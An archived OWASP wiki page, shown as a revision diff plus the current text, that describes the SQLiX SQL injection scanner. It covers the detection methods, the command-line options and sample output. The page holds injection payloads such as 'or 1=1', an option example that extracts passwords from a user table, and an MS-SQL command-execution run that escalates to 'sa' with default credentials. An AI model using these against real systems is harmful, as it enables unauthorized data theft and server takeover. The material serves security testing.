This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Category:OWASP SQLiX Project"

From OWASP
Jump to: navigation, search
(Goals)
m (Added a date to be more clear.)
 
(48 intermediate revisions by 14 users not shown)
Line 1: Line 1:
== Overview ==
+
=Main=
  
SQLiX, coded in Perl, is able to crawl, find SQL injection vectors, identify the back end database and grab function call/UDF results (even execute system commands for MS-SQL). The concepts in use are different than the one used in other SQL injection scanners. SQLiX is able to find normal and blind SQL injection vectors and doesn't need to reverse engineer the original SQL request (using only function calls).
+
<!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE -->
 +
<div style="width:100%;height:100px;border:0,margin:0;overflow: hidden;">[[Image:OWASP Inactive Banner.jpg|800px| link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Inactive_Projects]] </div>
  
== Goals ==
+
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
'''SQLiX''' is a '''SQL Injection scanner''' which attempts to fill the gap between what commercial software available on the market can do and what can really be done to detect and identify SQL injection.
+
| valign="top"  style="border-right: 1px dotted gray;padding-right:25px;" |
 +
'''NOTE:'''
 +
 
 +
The project is currently under the process of porting from Perl to Python. The next version will be released soon!<br />-- AnirudhAnand, 16 March 2014
 +
 
 +
==Introduction==
 +
 
 +
SQLiX is a [[SQL Injection]] scanner coded in Perl. It is able to crawl, detect SQL injection vectors, identify the back-end database, and grab function call/UDF results (even execute system commands for MS-SQL). The concepts in use are different than the one used in other SQL injection scanners. SQLiX is able to find normal and blind SQL injection vectors and doesn't need to reverse engineer the original SQL request (using only function calls).
 +
 
 +
If you are a developer interested in remediating or avoiding the kinds of SQL injection vulnerabilities this tool can find, check out the OWASP [[SQL Injection Prevention Cheat Sheet]].
 +
 
 +
==Description==
 +
 
 +
'''SQLiX''' is a '''[[SQL Injection]] scanner''' which attempts to fill the gap between what commercial software available on the market can do and what can really be done to detect and identify SQL injection.
  
 
Current injection methods used by commercial web assessment software are based on error generation or statement injections.
 
Current injection methods used by commercial web assessment software are based on error generation or statement injections.
Line 17: Line 31:
 
'''statement injection:'''
 
'''statement injection:'''
  
The second method used is statement injection.
+
The second method used is statement injection. Let's look at an example:
Let's look at an example:
 
 
   
 
   
 
The target URL
 
The target URL
Line 40: Line 53:
  
  
----
+
==Licensing==
 +
OWASP SQLiX is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.
 +
 
  
 +
| valign="top"  style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |
  
'''How could SQLiX help to fill the gap?'''
+
== What is SQLiX? ==
  
1) SQLiX uses multiple techniques to determine if the current server-side script is vulnerable to SQL Injection
+
OWASP SQLiX provides:
  
--> conditional errors injection
+
* SQLiX uses multiple techniques to determine if the current server-side script is vulnerable to SQL Injection
 +
** conditional errors injection
 +
** blind injection based on integers, strings or statements
 +
** MS-SQL verbose error messages ("taggy" method)
 +
* SQLiX using UDF (User defined functions) or function calls thus no need to reverse engineer the original SQL syntax
 +
* SQLix is able to identify the database version and gather sensitive information for the following SQL servers: MS-Access, MS-SQL, MySQL, Oracle and PostgreSQL.
 +
* The comparison module of SQLiX is able to deal with complex HTML contents even when they include dynamic ads
 +
* SQLiX contains an exploit module to demonstrate how a hacker could exploit the found SQL injection to gather sensitive information
  
--> blind injection based on integers, strings or statements
 
  
--> MS-SQL verbose error messages ("taggy" method)
+
== Presentation ==
  
2) SQLiX using UDF (User defined functions) or function calls thus no need to reverse engineer the original SQL syntax
+
Link to presentation
  
3) SQLix is able identify the database version and gather sensitive information for the following SQL servers: MS-Access, MS-SQL, MySQL, Oracle and PostgreSQL.
 
  
4) The comparison module of SQLiX is able to deal with complex HTML contents even when they include dynamic ads
 
  
5) SQLiX contains an exploit module to demonstrate how a hacker could exploit the found SQL injection to gather sensitive information
+
== Project Leader ==
  
== Download ==
+
Anirudh
  
OWASP SQLiX v1.0 is available for download [http://cedri.cc/tools/SQLiX_v1.0.tar.gz '''here'''].
 
  
== Features ==
 
  
TBD
+
== Related Projects ==
  
== Command line usage ==
+
 
 +
 
 +
| valign="top"  style="padding-left:25px;width:200px;" |
 +
 
 +
== Quick Download ==
 +
 
 +
OWASP SQLiX v1.0 is available for download [http://cedri.cc/tools/SQLiX_v1.0.tar.gz '''here'''] or [http://www.mediafire.com/?5lbt0tb1jee '''here'''].
 +
 
 +
 
 +
== News and Events ==
 +
* [20 Nov 2013] News 2
 +
* [30 Sep 2013] News 1
 +
 
 +
 
 +
== In Print ==
 +
 
 +
 
 +
 
 +
==Classifications==
 +
 
 +
  {| width="200" cellpadding="2"
 +
  |-
 +
  | align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
 +
  | align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] 
 +
  |-
 +
  | align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]
 +
  |-
 +
  | colspan="2" align="center"  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
 +
  |-
 +
  | colspan="2" align="center"  | [[File:Project_Type_Files_CODE.jpg|link=]]
 +
  |}
 +
 
 +
|}
 +
 
 +
=Requirements=
 +
Perl with the following dependencies:
 +
 
 +
WWW::CheckSite
 +
 
 +
Tie::CharArray
 +
 
 +
      perl -MCPAN -e 'install WWW::CheckSite'
 +
      perl -MCPAN -e 'install Tie::CharArray'
 +
 
 +
= Command line usage =
  
 
'''Usage: SQLiX.pl [options]'''
 
'''Usage: SQLiX.pl [options]'''
        -help                                   Show this help
+
-help                             Show this help
  
 
Target specification:
 
Target specification:
        -url [URL]                             Scan a given URL.
+
-url [URL]                         Scan a given URL.
                                                  Example: -url="http://target.com/index.php?id=1"
+
                                      Example: -url="http://target.com/index.php?id=1"
        --post_content [CONTENT]               Add a content to the current [URL] and change the HTTP method to POST
+
--post_content [CONTENT]           Add a content to the current [URL]
        -file [FILE_NAME]                       Scan a list of URI provided via a flat file.
+
                                      and change the HTTP method to POST
                                                  Example: -file="./crawling"
+
-file [FILE_NAME]                 Scan a list of URI provided via a flat file.
        -crawl [ROOT_URL]                       Scan a web site from the given root URL.
+
                                      Example: -file="./crawling"
                                                  Example: -crawl="http://target.com/"
+
-crawl [ROOT_URL]                 Scan a web site from the given root URL.
 +
                                      Example: -crawl="http://target.com/"
  
 
Injection vectors:
 
Injection vectors:
        -referer                               Use HTTP referer as a potential injection vector.
+
-referer                           Use HTTP referer as a potential injection vector.
        -agent                                 Use HTTP User agent as a potential injection vector.
+
-agent                             Use HTTP User agent as a potential injection vector.
        -cookie [COOKIE]                       Use the cookie as a potential injection vector.
+
-cookie [COOKIE]                   Use the cookie as a potential injection vector.
                                                  Cookie value has to be specified and the injection area
+
                                      Cookie value has to be specified and the injection area
                                                  tagged as "--INJECT_HERE--".
+
                                      tagged as "--INJECT_HERE--".
                                                  Example: -cookie="userID=--INJECT_HERE--"
+
                                      Example: -cookie="userID=--INJECT_HERE--"
  
 
Injection methods:
 
Injection methods:
        -all                                   Use all the injection methods.
+
-all                               Use all the injection methods.
        -method_taggy                           Use MS-SQL "verbose" error messages method.
+
-method_taggy                     Use MS-SQL "verbose" error messages method.
        -method_error                           Use conditional error messages injection method.
+
-method_error                     Use conditional error messages injection method.
        -method_blind                           Use all blind injection methods.
+
-method_blind                     Use all blind injection methods.
        -method_blind_integer                   Use integer blind injection method.
+
-method_blind_integer             Use integer blind injection method.
        -method_blind_string                   Use string blind injection method.
+
-method_blind_string               Use string blind injection method.
        -method_blind_statement                 Use statement blind injection method.
+
-method_blind_statement           Use statement blind injection method.
        -method_blind_comment                   Use MySQL comment blind injection method.
+
-method_blind_comment             Use MySQL comment blind injection method.
  
 
Attack modules:
 
Attack modules:
        -exploit                               Exploit the found injection to extract information.
+
-exploit                           Exploit the found injection to extract information.
                                                  by default the version of the database will be retrieved
+
                                      by default the version of the database will be retrieved
        -function [function]                   Used with exploit to retrieve a given function value.
+
-function [function]               Used with exploit to retrieve a given function value.
                                                  Example: -function="system_user"
+
                                      Example: -function="system_user"
                                                  Example: -function="(select password from user_table)"
+
                                      Example: -function="(select password from user_table)"
        -union                                 Analyse target for potential UNION attack [MS-SQL only].
+
-union                             Analyse target for potential UNION attack [MS-SQL only].
  
 
MS-SQL System command injection:
 
MS-SQL System command injection:
        -cmd [COMMAND]                         System command to be executed.
+
-cmd [COMMAND]                     System command to be executed.
                                                  Example: -cmd="dir c:\\"
+
                                      Example: -cmd="dir c:\\"
        -login [LOGIN]                         MS-SQL login to use if known.
+
-login [LOGIN]                     MS-SQL login to use if known.
        -password [PASSWORD]                   MS-SQL password to use if known.
+
-password [PASSWORD]               MS-SQL password to use if known.
  
 
Verbosity:
 
Verbosity:
        -v=[n]                                 Verbose mode level
+
-v=[n]                             Verbose mode level
                                                  v=0 => no output, only results are displayed at the end
+
                                      v=0 => no output, only results are displayed at the end
                                                  v=2 => realtime display, provide minimum result info
+
                                      v=2 => realtime display, provide minimum result info
                                                  v=5 => debug view [all url,content and headers are displayed]
+
                                      v=5 => debug view [all url,content and headers are displayed]
  
== Output example: MS-SQL System command execution ==
 
  
'''$ perl SQLiX.pl -file crawling -all -v=2 -exploit -cmd="dir c:\\"'''
+
= Output example =
 +
 
 +
*'''MS-SQL System command execution'''
 +
 
 +
$ perl SQLiX.pl -file crawling -all -v=2 -exploit -cmd="dir c:\\"
  
 
  ======================================================
 
  ======================================================
Line 132: Line 198:
 
  Analysing URI obtained by flat file [crawling]
 
  Analysing URI obtained by flat file [crawling]
 
   http://www.target.example.com/DocumentDescription-HR.asp?DocID=2
 
   http://www.target.example.com/DocumentDescription-HR.asp?DocID=2
        [+] working on DocID
+
      [+] working on DocID
                [+] Method: MS-SQL error message
+
            [+] Method: MS-SQL error message
                        [FOUND] MS-SQL error message (implicite without quotes)
+
                  [FOUND] MS-SQL error message (implicite without quotes)
                        [FOUND] function [@@version]:
+
                  [FOUND] function [@@version]:
                                Microsoft SQL Server  2000 - 8.00.534 (Intel X86)  
+
                          Microsoft SQL Server  2000 - 8.00.534 (Intel X86)  
                                        Nov 19 2001 13:23:50  
+
                                  Nov 19 2001 13:23:50  
                                        Copyright (c) 1988-2000 Microsoft Corporation
+
                                  Copyright (c) 1988-2000 Microsoft Corporation
                                        Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
+
                                  Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
                        [INFO] System command injector:
+
                  [INFO] System command injector:
                        [INFO] Current database: HR
+
                  [INFO] Current database: HR
                        [INFO] We are not sysadmin for now
+
                  [INFO] We are not sysadmin for now
                        [INFO] Checking OpenRowSet availibility - please wait...
+
                  [INFO] Checking OpenRowSet availibility - please wait...
                                [INFO] Current user login: [HR]
+
                        [INFO] Current user login: [HR]
                                [FOUND] OPENROWSET available - (login [sa] | password [sa])
+
                        [FOUND] OPENROWSET available - (login [sa] | password [sa])
                                [INFO] Privilege escalation - from [HR] to [sa]
+
                        [INFO] Privilege escalation - from [HR] to [sa]
 
                                  
 
                                  
                                ===========================================================================
+
                        ===========================================================================
 
   
 
   
                                  Volume in drive C has no label.
+
                        Volume in drive C has no label.
                                  Volume Serial Number is 00BC-6F73
+
                        Volume Serial Number is 00BC-6F73
 
                                  
 
                                  
                                  Directory of c:\
+
                        Directory of c:\
 
                                  
 
                                  
                                11/21/2005  06:36p      <DIR>          403679d1f6ca54e5384256556434111d
+
                        11/21/2005  06:36p      <DIR>          403679d1f6ca54e5384256556434111d
                                07/14/2006  10:49a      <DIR>          Documents and Settings
+
                        07/14/2006  10:49a      <DIR>          Documents and Settings
                                07/22/2005  02:21p      <DIR>          honeypot
+
                        07/22/2005  02:21p      <DIR>          honeypot
                                07/21/2005  04:38p      <DIR>          iDefense
+
                        07/21/2005  04:38p      <DIR>          iDefense
                                03/08/2002  08:23a      <DIR>          Inetpub
+
                        03/08/2002  08:23a      <DIR>          Inetpub
                                07/14/2006  03:21p      <DIR>          Program Files
+
                        07/14/2006  03:21p      <DIR>          Program Files
                                08/07/2006  04:11p                622 tmp.txt
+
                        08/07/2006  04:11p                622 tmp.txt
                                11/28/2005  06:06p      <DIR>          WINNT
+
                        11/28/2005  06:06p      <DIR>          WINNT
                                                1 File(s)            622 bytes
+
                                        1 File(s)            622 bytes
                                                7 Dir(s)    183,328,768 bytes free
+
                                        7 Dir(s)    183,328,768 bytes free
 
                                  
 
                                  
 
                                    
 
                                    
                                ===========================================================================
+
                        ===========================================================================
 
   
 
   
                        [FOUND] MS-SQL error message
+
                  [FOUND] MS-SQL error message
 
    
 
    
 
  RESULTS:
 
  RESULTS:
Line 175: Line 241:
 
     ... is vulnerable to SQL Injection [TAG implicite without quotes - MSSQL].
 
     ... is vulnerable to SQL Injection [TAG implicite without quotes - MSSQL].
  
== Output example: MySQL, PostgreSQL function Injection ==
 
  
'''$ perl SQLiX.pl -file crawling -all -v=2 -exploit'''
+
*'''MySQL, PostgreSQL function Injection'''
 +
 
 +
$ perl SQLiX.pl -file crawling -all -v=2 -exploit
  
 
  ======================================================
 
  ======================================================
Line 186: Line 253:
 
  Analysing URI obtained by flat file [crawling]
 
  Analysing URI obtained by flat file [crawling]
 
   http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2
 
   http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2
        [+] working on DocID
+
      [+] working on DocID
                [+] Method: MS-SQL error message
+
            [+] Method: MS-SQL error message
                [+] Method: SQL error message
+
            [+] Method: SQL error message
                        [FOUND] Match found INPUT:[user] - "Microsoft OLE DB Provider for ODBC Drivers"
+
                  [FOUND] Match found INPUT:[user] - "Microsoft OLE DB Provider for ODBC Drivers"
                        [INFO] Error without quote
+
                  [INFO] Error without quote
                        [INFO] Database identified: MySQL Server
+
                  [INFO] Database identified: MySQL Server
                        [INFO] Current function: version()
+
                  [INFO] Current function: version()
                        [INFO] length: 19
+
                  [INFO] length: 19
                            4.1.20-community-nt
+
                      4.1.20-community-nt
                        [FOUND] SQL error message
+
                  [FOUND] SQL error message
 
   http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2
 
   http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2
        [+] working on DocID
+
      [+] working on DocID
                [+] Method: MS-SQL error message
+
            [+] Method: MS-SQL error message
                [+] Method: SQL error message
+
            [+] Method: SQL error message
                        [FOUND] Match found INPUT:['] - "Microsoft OLE DB Provider for ODBC Drivers"
+
                  [FOUND] Match found INPUT:['] - "Microsoft OLE DB Provider for ODBC Drivers"
                        [INFO] Error without quote
+
                  [INFO] Error without quote
                        [INFO] Database identified: PostgreSQL Server
+
                  [INFO] Database identified: PostgreSQL Server
                        [INFO] Current function: version()
+
                  [INFO] Current function: version()
                        [INFO] length: 88
+
                  [INFO] length: 88
                            PostgreSQL 8.0.7 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2 (mingw-special)
+
                      PostgreSQL 8.0.7 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2
                        [FOUND] SQL error message
+
                  [FOUND] SQL error message
 
   
 
   
 
  RESULTS:
 
  RESULTS:
  The variable [DocID] from [ http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2 ] ...
+
  The variable [DocID] from  
 +
  [ http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2 ] ...
 
     ... is vulnerable to SQL Injection [Error message (user) - MySQL].
 
     ... is vulnerable to SQL Injection [Error message (user) - MySQL].
  The variable [DocID] from [ http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2 ] ...
+
  The variable [DocID] from
 +
  [ http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2 ] ...
 
     ... is vulnerable to SQL Injection [Error message (') - PostgreSQL].
 
     ... is vulnerable to SQL Injection [Error message (') - PostgreSQL].
  
== Future Development ==
 
  
Currently working on a module able to dump the database schema and the data of the vulnerable database.
 
  
PS: If you are a real Perl developer (not like me ;) ), feel free to provide code improvement or advice.
 
  
== News ==
+
= Acknowledgements =
 +
==Volunteers==
 +
 
  
'''OWASP SQLiX Project Created! - 09:45, 28 August 2006 (EDT)'''
+
= Road Map and Getting Involved =
 +
As of XXX, the priorities are:
 +
* xxx
 +
* xxx
 +
* xxx
  
While the SQLiX Project has been under development for some time now, it has only recently been donated to OWASP.
+
We hope you find the OWASP SQLiX Project useful. Please contribute to the Project by volunteering for one of the Tasks, sending your comments, questions, and suggestions to [email protected].  To join the OWASP SQLiX Project mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-sqlix subscription page.]
  
The OWASP community would like to thank Cedric Cochin for the generous donation.
 
  
== Project Contributor ==
 
  
The project is lead by Cedric Cochin (cedric.cochin at gmail dot com)
 
  
[http://cedri.cc Homepage]
 
  
== Project Sponsors ==
+
=Project About=
 +
==== Project Identification ====
 +
{{:GPC_Project_Details/OWASP_SQLiX_Project | OWASP Project Identification Tab}}}}
  
If you would like to help SQLiX project developement, feel free to contact the project leader.
+
__NOTOC__ <headertabs />
  
  
[[Category:OWASP Project]]
+
[[Category:OWASP Project|SQLiX Project]]
 +
[[Category:OWASP Download]]
 +
[[Category:OWASP Tool]]
 +
[[Category:SQL]]
 +
[[Category:OWASP Oracle Project]]

Latest revision as of 18:51, 25 May 2017

OWASP Inactive Banner.jpg

NOTE:

The project is currently under the process of porting from Perl to Python. The next version will be released soon!
-- AnirudhAnand, 16 March 2014

Introduction

SQLiX is a SQL Injection scanner coded in Perl. It is able to crawl, detect SQL injection vectors, identify the back-end database, and grab function call/UDF results (even execute system commands for MS-SQL). The concepts in use are different than the one used in other SQL injection scanners. SQLiX is able to find normal and blind SQL injection vectors and doesn't need to reverse engineer the original SQL request (using only function calls).

If you are a developer interested in remediating or avoiding the kinds of SQL injection vulnerabilities this tool can find, check out the OWASP SQL Injection Prevention Cheat Sheet.

Description

SQLiX is a SQL Injection scanner which attempts to fill the gap between what commercial software available on the market can do and what can really be done to detect and identify SQL injection.

Current injection methods used by commercial web assessment software are based on error generation or statement injections.

error generation:

The error generation method is quite simple and is based on meta characters like single quotes or double quotes. By injecting these characters in the original SQL request, you generate a syntax error which could result in an SQL error message displayed in the HTTP reply. The main issue with this technique is the fact that it's only based on pattern matching. There is no way to handle multiple languages or complex behaviors when the error message is filtered by the server-side scripts.

statement injection:

The second method used is statement injection. Let's look at an example:

The target URL 

(0) is http://target.example.com/news.php?id=25.

The scanner will try to compare the HTML content of the original request with the HTML content of 

(1) http://target.example.com/news.php?id=25%20or%201=1

(2) http://target.example.com/news.php?id=25%20or%201=0

If the request (1) provides the same result as request (0) and request (2) doesn't, the scanner will conclude that SQL injection is possible. This method works fine, but is very limited by the syntax of the original request. If the original request contains parentheses, store procedures or function calls, this method will rarely work. Worse, if the variable is used by multiple SQL requests, all with different syntaxes, there is no automatic way to make them all work simultaneously.

Frequently you will see more advanced scanners like SQLBrute from www.justinclarke.com trying to reverse engineer the original SQL syntax by injecting multiple requests with different sets of parentheses or comas. This method is a little more time consuming but does provide better results (for free), especially when error messages are not displayed.

Another global issue concerning SQL injection is the fact that pen testers frequently conclude that a given SQL injection vulnerability can't be exploited. By concluding this incorrect statement they are inviting their customers to not patch the vulnerability.


Licensing

OWASP SQLiX is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.


What is SQLiX?

OWASP SQLiX provides:

  • SQLiX uses multiple techniques to determine if the current server-side script is vulnerable to SQL Injection
    • conditional errors injection
    • blind injection based on integers, strings or statements
    • MS-SQL verbose error messages ("taggy" method)
  • SQLiX using UDF (User defined functions) or function calls thus no need to reverse engineer the original SQL syntax
  • SQLix is able to identify the database version and gather sensitive information for the following SQL servers: MS-Access, MS-SQL, MySQL, Oracle and PostgreSQL.
  • The comparison module of SQLiX is able to deal with complex HTML contents even when they include dynamic ads
  • SQLiX contains an exploit module to demonstrate how a hacker could exploit the found SQL injection to gather sensitive information


Presentation

Link to presentation


Project Leader

Anirudh


Related Projects

Quick Download

OWASP SQLiX v1.0 is available for download here or here.


News and Events

  • [20 Nov 2013] News 2
  • [30 Sep 2013] News 1


In Print

Classifications

Owasp-incubator-trans-85.png Owasp-builders-small.png
Owasp-defenders-small.png
Cc-button-y-sa-small.png
Project Type Files CODE.jpg

Perl with the following dependencies:

WWW::CheckSite

Tie::CharArray 

     perl -MCPAN -e 'install WWW::CheckSite'
     perl -MCPAN -e 'install Tie::CharArray'

Usage: SQLiX.pl [options] 

-help                              Show this help

Target specification: 

-url [URL]                         Scan a given URL.
                                     Example: -url="http://target.com/index.php?id=1"
--post_content [CONTENT]           Add a content to the current [URL]
                                     and change the HTTP method to POST
-file [FILE_NAME]                  Scan a list of URI provided via a flat file.
                                     Example: -file="./crawling"
-crawl [ROOT_URL]                  Scan a web site from the given root URL.
                                     Example: -crawl="http://target.com/"

Injection vectors: 

-referer                           Use HTTP referer as a potential injection vector.
-agent                             Use HTTP User agent as a potential injection vector.
-cookie [COOKIE]                   Use the cookie as a potential injection vector.
                                     Cookie value has to be specified and the injection area
                                     tagged as "--INJECT_HERE--".
                                     Example: -cookie="userID=--INJECT_HERE--"

Injection methods: 

-all                               Use all the injection methods.
-method_taggy                      Use MS-SQL "verbose" error messages method.
-method_error                      Use conditional error messages injection method.
-method_blind                      Use all blind injection methods.
-method_blind_integer              Use integer blind injection method.
-method_blind_string               Use string blind injection method.
-method_blind_statement            Use statement blind injection method.
-method_blind_comment              Use MySQL comment blind injection method.

Attack modules: 

-exploit                           Exploit the found injection to extract information.
                                     by default the version of the database will be retrieved
-function [function]               Used with exploit to retrieve a given function value.
                                     Example: -function="system_user"
                                     Example: -function="(select password from user_table)"
-union                             Analyse target for potential UNION attack [MS-SQL only].

MS-SQL System command injection: 

-cmd [COMMAND]                     System command to be executed.
                                     Example: -cmd="dir c:\\"
-login [LOGIN]                     MS-SQL login to use if known.
-password [PASSWORD]               MS-SQL password to use if known.

Verbosity: 

-v=[n]                             Verbose mode level
                                     v=0 => no output, only results are displayed at the end
                                     v=2 => realtime display, provide minimum result info
                                     v=5 => debug view [all url,content and headers are displayed]


  • MS-SQL System command execution 
$ perl SQLiX.pl -file crawling -all -v=2 -exploit -cmd="dir c:\\"

======================================================
                   -- SQLiX --
 © Copyright 2006 Cedric COCHIN, All Rights Reserved.
======================================================

Analysing URI obtained by flat file [crawling]
 http://www.target.example.com/DocumentDescription-HR.asp?DocID=2
      [+] working on DocID
            [+] Method: MS-SQL error message
                  [FOUND] MS-SQL error message (implicite without quotes)
                  [FOUND] function [@@version]:
                          Microsoft SQL Server  2000 - 8.00.534 (Intel X86) 
                                 Nov 19 2001 13:23:50 
                                 Copyright (c) 1988-2000 Microsoft Corporation
                                 Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
                  [INFO] System command injector:
                  [INFO] Current database: HR
                  [INFO] We are not sysadmin for now
                  [INFO] Checking OpenRowSet availibility - please wait...
                        [INFO] Current user login: [HR]
                        [FOUND] OPENROWSET available - (login [sa] | password [sa])
                        [INFO] Privilege escalation - from [HR] to [sa]
                                
                        ===========================================================================

                        Volume in drive C has no label.
                        Volume Serial Number is 00BC-6F73
                                
                        Directory of c:\
                                
                        11/21/2005  06:36p      <DIR>          403679d1f6ca54e5384256556434111d
                        07/14/2006  10:49a      <DIR>          Documents and Settings
                        07/22/2005  02:21p      <DIR>          honeypot
                        07/21/2005  04:38p      <DIR>          iDefense
                        03/08/2002  08:23a      <DIR>          Inetpub
                        07/14/2006  03:21p      <DIR>          Program Files
                        08/07/2006  04:11p                 622 tmp.txt
                        11/28/2005  06:06p      <DIR>          WINNT
                                       1 File(s)            622 bytes
                                       7 Dir(s)     183,328,768 bytes free
                                
                                 
                        ===========================================================================

                  [FOUND] MS-SQL error message
 
RESULTS:
The variable [DocID] from [ http://www.target.example.com/DocumentDescription-HR.asp?DocID=2 ] ...
   ... is vulnerable to SQL Injection [TAG implicite without quotes - MSSQL].


  • MySQL, PostgreSQL function Injection
$ perl SQLiX.pl -file crawling -all -v=2 -exploit

======================================================
                   -- SQLiX --
 © Copyright 2006 Cedric COCHIN, All Rights Reserved.
======================================================

Analysing URI obtained by flat file [crawling]
 http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2
      [+] working on DocID
            [+] Method: MS-SQL error message
            [+] Method: SQL error message
                  [FOUND] Match found INPUT:[user] - "Microsoft OLE DB Provider for ODBC Drivers"
                  [INFO] Error without quote
                  [INFO] Database identified: MySQL Server
                  [INFO] Current function: version()
                  [INFO] length: 19
                      4.1.20-community-nt
                  [FOUND] SQL error message
 http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2
      [+] working on DocID
            [+] Method: MS-SQL error message
            [+] Method: SQL error message
                  [FOUND] Match found INPUT:['] - "Microsoft OLE DB Provider for ODBC Drivers"
                  [INFO] Error without quote
                  [INFO] Database identified: PostgreSQL Server
                  [INFO] Current function: version()
                  [INFO] length: 88
                      PostgreSQL 8.0.7 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2
                  [FOUND] SQL error message

RESULTS:
The variable [DocID] from 
  [ http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2 ] ...
   ... is vulnerable to SQL Injection [Error message (user) - MySQL].
The variable [DocID] from
  [ http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2 ] ...
   ... is vulnerable to SQL Injection [Error message (') - PostgreSQL].



Volunteers

As of XXX, the priorities are:

  • xxx
  • xxx
  • xxx

We hope you find the OWASP SQLiX Project useful. Please contribute to the Project by volunteering for one of the Tasks, sending your comments, questions, and suggestions to [email protected]. To join the OWASP SQLiX Project mailing list or view the archives, please visit the subscription page.



Project Identification

PROJECT INFO
What does this OWASP project offer you?
what is this project?
OWASP SQLiX Project

Purpose: N/A

License: N/A

who is working on this project?
Project Leader: N/A

Project Maintainer:

Project Contributor(s): N/A

how can you learn more?
Project Pamphlet: N/A

3x slide Project Presentation: N/A

Mailing list: N/A

Project Roadmap: N/A

Main links: N/A

Project Health: Yellow button.JPG Not Reviewed (Provisional)
To be reviewed under Assessment Criteria v2.0

Key Contacts
  • Contact the GPC to contribute, review or sponsor this project
  • Contact the GPC to report a problem or concern about this project or to update information.
}}

Subcategories

This category has only the following subcategory.

O

Retrieved from "https://wiki.owasp.org/index.php?title=Category:OWASP_SQLiX_Project&oldid=230041"